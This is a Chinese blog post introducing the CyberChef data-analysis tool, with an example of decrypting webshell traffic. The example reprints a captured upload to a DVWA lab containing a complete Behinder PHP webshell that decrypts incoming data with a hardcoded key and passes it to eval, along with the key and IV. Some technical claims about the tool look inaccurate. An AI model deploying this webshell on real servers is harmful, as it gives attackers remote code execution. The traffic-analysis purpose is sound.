CyberChef说明
CyberChef 是一款由英国政府通信总部(GCHQ)开发的一款强大的开源工具,用于数据转换和分析。是一个强大且实用的工具,无论是应对日常的数据处理需求,还是执行专业的网络安全分析工作,都能提供显著便利。其开源性质和丰富特性极大地鼓励了社区的参与和贡献,从而驱动着 CyberChef 的持续改进和发展。现在就可以尝试一下,体验它能为你的工作或学习带来的效率提升!
项目简介
CyberChef 是一款开源在线工具,由英国政府通信总部(GCHQ)开发,旨在帮助普通用户和专业人员轻松地进行复杂的加密、解密、编码、转换等操作。该项目力求简化网络空间的数据处理流程,无论你是安全专家还是对网络安全感兴趣的技术爱好者,都能从中受益。
技术分析
CyberChef 的核心是其“菜谱”系统:每个菜谱定义了一系列操作的序列,这些操作可以组合起来完成各种复杂任务。项目基于 HTML5, JavaScript 和 CSS3 等现代 Web 技术构建,无需安装额外软件即可在任何支持现代浏览器的设备上运行。它采用 AngularJS 框架,提供直观的用户界面,允许用户通过拖放操作以创建自定义菜谱。此外,CyberChef 还支持通过 RESTful API 进行编程访问,方便与其他应用或脚本集成。
功能应用
- 加密/解密:支持多种标准加密算法,包括 AES、RSA、HMAC 等,适用于保护敏感信息或分析加密流量。
- 编码/解码:几乎涵盖所有常见格式,例如 Base64、Hex 到 URL 编码等二进制和文本编码。
- 数据转换:可执行日期时间转换、JSON 到 CSV 的转换,甚至进行图像文件的 ASCII 渲染。
- 网络分析:提取 HTTP 头信息、解析 JSON 或 XML 数据,非常适用于网络安全监控和日志分析。
- 数据混淆/脱壳:服务于逆向工程目的,从混淆的代码或数据中提取有意义的信息。
特点
- 易用性:即使新手也能通过简洁的图形化界面快速上手。
- 灵活性:“菜谱”概念使用户能够按需定制数据处理流程。
- 扩展性:开发者可通过编写新的操作扩展其功能。
- 可保存和分享:方便用户保存和分享菜谱,促进复用与协作。
- 隐私保障:所有操作均在本地浏览器中执行,数据默认不会离开用户的设备(除非用户主动选择导出结果)。
CyberChef使用举例
解密上传的冰蝎流量包(CSDN阿文)
POST /web-zh/DVWA/vulnerabilities/upload/ HTTP/1.1
Host: 192.168.197.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------229392202523091708492738618176
Content-Length: 1126
Origin: http://192.168.197.111
Connection: keep-alive
Referer: http://192.168.197.111/web-zh/DVWA/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=mseedvb8947p0idkoeqmgivfv1
Upgrade-Insecure-Requests: 1
-----------------------------229392202523091708492738618176
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
-----------------------------229392202523091708492738618176
Content-Disposition: form-data; name="uploaded"; filename="shells.php"
Content-Type: application/octet-stream
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //........................32...md5.........16........................rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
-----------------------------229392202523091708492738618176
Content-Disposition: form-data; name="Upload"
Upload
-----------------------------229392202523091708492738618176--
HTTP/1.1 200 OK
Date: Tue, 17 Oct 2023 15:23:24 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5059
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
破解要点
iv(偏移):0123456789abcdef
key(在上传的文件中):e45e329feb5d925b
在线使用CyberChef
CyberChef在线工具:http://150.158.38.114:5900/
© 版权声明
THE END
暂无评论内容